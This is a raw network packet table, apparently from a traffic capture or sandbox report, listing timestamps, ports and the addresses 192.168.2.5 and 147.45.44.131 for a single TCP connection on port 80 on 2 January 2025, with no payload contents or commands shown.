Jan 2, 2025 19:14:16.249285936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249300003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.249325037 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.249346972 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.255146980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255155087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255161047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255167007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255172968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255178928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255183935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.255207062 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.255266905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.292490959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292499065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292511940 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292519093 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292603970 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.292634964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292642117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292654037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292659044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.292676926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.292728901 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332452059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332503080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332508087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332515001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332528114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332534075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332540989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332596064 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332613945 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332613945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332621098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332628012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332633018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332655907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332662106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332662106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332668066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332695961 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332710028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332717896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332739115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332742929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332748890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332787991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332788944 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332788944 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332875967 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332889080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332890987 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332925081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332930088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332933903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332937002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332942963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332957029 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.332979918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332986116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.332998037 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333003044 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333004951 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333040953 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333054066 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333071947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333086014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333092928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333097935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333103895 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333146095 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333146095 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333178997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333184958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333197117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333230019 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333235979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333240986 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333240986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333247900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333255053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333267927 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333293915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333372116 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333376884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333380938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333430052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333436966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333441973 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333447933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333447933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333462000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333467960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333523035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333590031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333605051 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333611012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333659887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333662033 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333734989 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333764076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333770990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333782911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333787918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333798885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333803892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333811045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333823919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333832979 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333834887 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333848000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333853960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333867073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333897114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333901882 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333904028 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333904028 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333914042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333920956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333956957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333962917 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.333966017 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.333970070 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334021091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334042072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334054947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334063053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334068060 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334084034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334121943 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334148884 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334153891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334166050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334180117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334184885 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334229946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334229946 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334306955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334312916 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334320068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334325075 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334331989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334342957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334363937 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334414959 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334445000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334458113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334464073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334469080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334475040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334492922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334500074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334503889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334506035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334512949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334534883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334534883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334664106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334677935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334691048 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334702015 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334707022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334732056 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334732056 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334744930 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334750891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334763050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334764004 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334768057 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.334825039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.334825039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.341586113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341592073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341598034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341604948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341610909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341617107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341629028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341634989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.341648102 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.341700077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.378990889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379070997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379076958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379089117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379095078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379101992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379107952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.379144907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.379199028 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419507980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419522047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419528961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419539928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419545889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419550896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419557095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419562101 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419568062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419574022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419579983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419589043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419589043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419590950 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419605970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419611931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419624090 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419629097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419641018 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419646025 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419650078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419661045 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419667006 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419680119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419713020 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419744968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419750929 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419775963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419780970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419792891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419797897 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419801950 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419805050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419837952 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419855118 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419897079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419905901 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419919014 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419929028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.419931889 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419943094 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.419998884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420022011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420028925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420039892 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420044899 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420059919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420064926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420092106 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420092106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420092106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420099020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420104980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420161009 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420169115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420176029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420182943 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420192003 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420217991 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420247078 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420296907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420308113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420319080 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420325041 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420339108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420345068 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420351028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420356989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420393944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420401096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420411110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420418024 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420418024 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420444012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420449018 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420484066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420490026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420500994 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420510054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420514107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420517921 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420527935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420531988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420574903 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420605898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420618057 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420620918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420628071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420634985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420640945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420655966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420679092 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420716047 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420717001 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420721054 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420732021 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420746088 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420751095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420787096 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420797110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420810938 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420810938 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420819044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420823097 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420835972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420856953 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420876980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420883894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420898914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420911074 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420938969 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.420965910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420984030 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.420996904 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421001911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421008110 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421017885 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421030998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421036959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421050072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421061993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421081066 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421104908 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421108961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421117067 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421123028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421128988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421158075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421190977 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421195984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421252966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421258926 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421264887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421271086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421277046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421303988 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421303988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421312094 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421319008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421324968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421329021 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421363115 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421400070 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.421444893 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421451092 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421463013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421467066 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:16.421530008 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:16.428411007 CET	80	49721	147.45.44.131	192.168.2.5
